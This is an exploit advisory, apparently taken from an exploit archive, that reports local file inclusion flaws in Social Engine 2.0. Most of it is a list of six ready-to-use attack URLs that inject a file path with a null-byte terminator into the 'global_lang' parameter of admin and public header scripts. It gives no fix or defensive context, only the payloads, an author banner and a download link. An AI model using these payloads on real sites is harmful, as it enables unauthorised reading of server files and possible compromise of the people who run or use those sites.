id: 2384
date: 12/21/2007
title: Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
author: MhZ91
cves: 

===============================================================
Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
===============================================================


---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Social Engine v2.0 - Local File Inclusion
# Download: http://scriptmafia.org/2007/12/17/social_engine_v2.0.html
# Bug: Local File Inclusion
---------------------------------------------------------------
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00
---------------------------------------------------------------



#  0day.today [2023-03-24]  #